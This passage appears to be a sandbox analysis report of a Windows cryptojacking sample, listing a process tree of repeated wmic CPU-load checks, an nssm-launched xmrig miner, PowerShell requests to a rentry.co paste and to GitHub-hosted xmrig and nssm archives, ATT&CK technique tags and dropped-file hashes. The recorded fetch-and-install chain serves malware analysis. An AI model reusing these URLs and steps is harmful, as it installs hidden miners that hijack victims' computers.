- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:948
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:860

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:3276
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3936

Network

DNS

rentry.co

powershell.exe

Remote address:

8.8.8.8:53

Request

rentry.co

IN A

Response

rentry.co

IN A

104.26.3.16

rentry.co

IN A

172.67.75.40

rentry.co

IN A

104.26.2.16
GET

https://rentry.co/regele/raw

powershell.exe

Remote address:

104.26.3.16:443

Request

GET /regele/raw HTTP/1.1
Host: rentry.co
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 01 Jul 2024 01:17:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 14923
Connection: keep-alive
vary: Origin
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
Cache-Control: Vary
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oinmQipDcKisQV748XnCD6KzWfhqe0CE357VF6cZc3Fhbudqv47iegzY9n7zDFbqg5K3Er9YBU9%2BX9eB9WeaR%2ByCbd0JYe2Be3j3tMg67EGdadWhvBxNvUpILQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89c28e853c39946b-LHR
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

powershell.exe

Remote address:

185.199.110.133:443

Request

GET /MoneroOcean/xmrig_setup/master/xmrig.zip HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3692486
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "cb4b18ad6d29e2eb894ed10da4876ab80201079a5b7383bfad9a7a24ee01822e"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B5AD:31BAA8:4E84ED:5D55D0:6680D5BF
Accept-Ranges: bytes
Date: Mon, 01 Jul 2024 01:17:30 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600098-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1719796651.675744,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 5ea8081ca3fc0d3a5a0163c09345f4ed206f01b0
Expires: Mon, 01 Jul 2024 01:22:30 GMT
Source-Age: 281
DNS

16.3.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.3.26.104.in-addr.arpa

IN PTR

Response
DNS

140.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.32.126.40.in-addr.arpa

IN PTR

Response
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
GET

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

powershell.exe

Remote address:

185.199.110.133:443

Request

GET /MoneroOcean/xmrig_setup/master/nssm.zip HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 138273
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "516060408d755298a7c2d5a55ef8816a492c342ce156e91f5893df4d25424a91"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 1D6F:2494A3:1084C:1BB5A:6680D5C7
Accept-Ranges: bytes
Date: Mon, 01 Jul 2024 01:17:33 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600051-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1719796654.572922,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 86d93ae9022dca64c92d8eab920fab9d91ae9bfd
Expires: Mon, 01 Jul 2024 01:22:33 GMT
Source-Age: 275
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response

104.26.3.16:443

https://rentry.co/regele/raw

tls, http

powershell.exe

1.1kB
20.0kB
16
24

HTTP Request

GET https://rentry.co/regele/raw

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

tls, http

powershell.exe

45.9kB
2.0MB
888
1443

HTTP Request

GET https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

tls, http

powershell.exe

3.1kB
147.7kB
59
112

HTTP Request

GET https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

HTTP Response

200

8.8.8.8:53

rentry.co

dns

powershell.exe

55 B
103 B
1
1

DNS Request

rentry.co

DNS Response

104.26.3.16

172.67.75.40

104.26.2.16
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

powershell.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.111.133

185.199.108.133

185.199.109.133
8.8.8.8:53

16.3.26.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

16.3.26.104.in-addr.arpa
8.8.8.8:53

140.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

140.32.126.40.in-addr.arpa
8.8.8.8:53

133.110.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.110.199.185.in-addr.arpa
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

144 B
146 B
2
1

DNS Request

15.164.165.52.in-addr.arpa

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
b1e180583d3525f6534cc1110224a5fb

SHA1
b7cadce5826cdbe5b7a16cc6116522e7885882b7

SHA256
2e7e0e975fd986c9156ccaf646991dc1f1620e0330ff7b934dbdfd5a7c4567f7

SHA512
a8b64bd8c0709ae0440846e98d9e8023506c5fc3228c5a4bb2a5ae29bc310fb7cf833219766a1305b708bd7f1b21d76b3efa1169d5c7ffa09412d2a4bb600752

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
79fd4dcee4117439f53397f5e94f27ab

SHA1
8231b701b35b7282d69feb7555deb4f2bcd7a9f6

SHA256
7c6089834f9fcabca17245e68a4913488c5029a8443e5b7684bdc72387eb96ad

SHA512
2cf8593eab20bdcac334f251615e2dad555234101ee39c9bdae7f72cb5447a0fce90d6405a70e55ae86b2ede2d99d07b1c9edf05a6b6afad0dbe51bcd833e4e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
633da34a38638896c9a56c65a984d48a

SHA1
1ecc48e2ec10396bbe8972facf94a28d4a20635b

SHA256
2fa8e367aeb35f24f88785d48e2058b217aa3479e61c65d25a94be0d73c98dfa

SHA512
79ee129be3599bb324d25e6c58c2b685499cb401d24860431dead811cc70841d892a24554398e65dc4e47e997e2e2c569d4f3a7cf38cedd36088897314e7d1fe

